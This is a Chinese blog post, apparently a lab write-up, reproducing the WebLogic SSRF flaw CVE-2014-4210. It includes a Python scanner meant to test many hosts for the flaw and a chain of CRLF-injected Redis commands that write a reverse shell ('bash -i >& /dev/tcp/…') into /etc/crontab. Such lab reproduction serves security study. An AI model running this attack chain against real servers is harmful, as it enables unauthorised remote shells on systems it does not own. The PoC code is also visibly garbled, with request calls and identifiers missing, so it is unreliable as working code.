WeblogicSSRF漏洞(CVE-2014-4210)漏洞复现--688IT编程网

WeblogicSSRF漏洞（CVE-2014-4210）漏洞复现

漏洞概述：

服务端请求伪造(Server-Side Request Forgery)，是⼀种有攻击者构造形成有服务端发起请求的⼀个安全漏洞。⼀般情况下，SSRF攻击的⽬标是从外⽹⽆法访问的内部系统。

SSRF形成的原因⼤都是由于服务端提供了从其他服务器应⽤获取数据的功能，且没有对⽬标地址做过滤与限制。⽐如从指定URL地址获取⽹页⽂本内容，加载指定地址的图⽚、⽂档等等。

SSRF⽤途：

1.内外⽹的端⼝和服务扫描。

2.主机本地敏感数据的读取。

3.内外⽹主机应⽤程序漏洞的利⽤。

4.内外⽹web站点漏洞的利⽤

影响版本：

weblogic 10.0.2 -- 10.3.6.0

漏洞环境：

Docker-compose build

Docker-compose up -d

复现过程：

1.漏洞位置。漏洞位置在uddiexplorer下的SearchPublicRegistries.jsp处。

漏洞位置

2.检测是否存在SSRF

2.1可直接

出现404说明是存在漏洞的。

2.2⽤burp抓包查看

测试是否存在SSRF漏洞，在url后跟端⼝，把url修改为⾃⼰搭建的服务器地址，访问开放的7001端⼝，发现返回如下信息：说明开放7001端⼝getsavefilename

存在端⼝报错

访问不存在的端⼝看下，不能到该服务，说明不存在该端⼝。

不存在端⼝报错

2.3也可⾃动检测：

poc：

#!/usr/bin/env python

# -*- coding: utf-8 -*-

import re

import sys

import Queue

import requests

import threading

from requests.ptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

queue = Queue.Queue()

mutex = threading.Lock()

class Test(threading.Thread):

def __init__(self, queue):

threading.Thread.__init__(self)

self.queue = queue

def check(self,domain,ip):

payload = "uddiexplorer/SearchPublicRegistries.jsp?operator=

{ip}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search".form at(ip=ip)

url = domain + payload

try:

html = (url=url, timeout=15, verify=False).content

m = re.search('weblogic.uddi.ption.XML_SoapException',html)

if m:

mutex.acquire()

with open('','a+') as f:

print "%s has weblogic ssrf." % domain

f.write("%s has weblogic ssrf." % domain)

except Exception,e:

print e

def get_registry(self,domain):

payload = 'uddiexplorer/SetupUDDIExplorer.jsp'

url = domain + payload

try:

html = (url=url, timeout=15, verify=False).content

m = re.search('<i>For example: (.*?)/uddi/uddilistener.*?</i>',html) if m:

up(1)

except Exception,e:

print e

def run(self):

while not pty():

domain = ()

mutex.acquire()

print domain

ip = _registry(domain)

self.check(domain,ip)

self.queue.task_done()

if __name__ == '__main__':

with open('','r') as f:

lines = f.readlines()

for line in lines:

queue.put(line.strip())

for x in xrange(1,50):

t = Test(queue)

t.setDaemon(True)

t.start()

queue.join()

⾃动检测

通过上⾯的测试，可以发现⽬标存在SSRF漏洞。

3.注⼊HTTP头，利⽤Redis反弹shell

%0a%0d来注⼊换⾏符，某些服这⾥要提下：Weblogic的SSRF有⼀个⽐较⼤的特点，其虽然是⼀个”GET/POST”请求，但是我们可以通过传⼊%0a%0d来注⼊换⾏符

务(如redis)是通过换⾏符来分隔每条命令，本环境可以通过该SSRF攻击内⽹中的redis服务器。

(1)主要发送3条redis的命令，将反弹shell脚本写⼊/etc/crontab

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/172.20.0.2/5555 0>&1\n\n\n\n"

config set dir /etc/

config set dbfilename crontab

save

（2）先通过前⾯⽅法探测内⽹开放6379端⼝，最后探测到172.20.0.2:6379开放

#192.168.220.128:5555 监听地址。

#172.20.0.2:6379 内⽹探测的redis地址及端⼝。

出现已经写⼊

getshell

反弹shell

漏洞修复：

升级⾼版本。

688IT编程网

WeblogicSSRF漏洞(CVE-2014-4210)漏洞复现

发表评论

推荐文章

随机森林算法介绍及R语言实现

基于随机森林优化的神经网络算法在冬小麦产量预测中的应用研究_百度文 ...

基于正则化贪心森林算法的情感分析方法研究

随机森林算法和grandientboosting算法

基于随机森林的图像分类算法研究

热门文章

随机森林特征选择原理

自动驾驶系统中的随机森林算法解析

随机森林算法及其在生物信息学中的应用

监督学习中的随机森林算法解析(六)

随机森林算法在数据分析中的应用

机器学习——随机森林,RandomForestClassifier参数含义详解

随机森林的算法

随机森林算法作用

监督学习中的随机森林算法解析(十)

随机森林算法案例

随机森林案例

二分类问题常用的模型

绘制ssd框架训练流程

一种基于信息熵和DTW的多维时间序列相似性度量算法

SVM训练过程范文

如何使用支持向量机进行股票预测与交易分析

二分类交叉熵损失函数binary

tinybert_训练中文文本分类模型_概述说明

基于门控可形变卷积和分层Transformer的图像修复模型及其应用

人工智能开发技术的测试和评估方法

最新文章

基于随机森林的数据分类算法改进

人工智能中的智能识别与分类技术

基于人工智能技术的随机森林算法在医疗数据挖掘中的应用

随机森林回归模型的建模步骤

r语言随机森林预测模型校准曲线

《2024年随机森林算法优化研究》范文

标签列表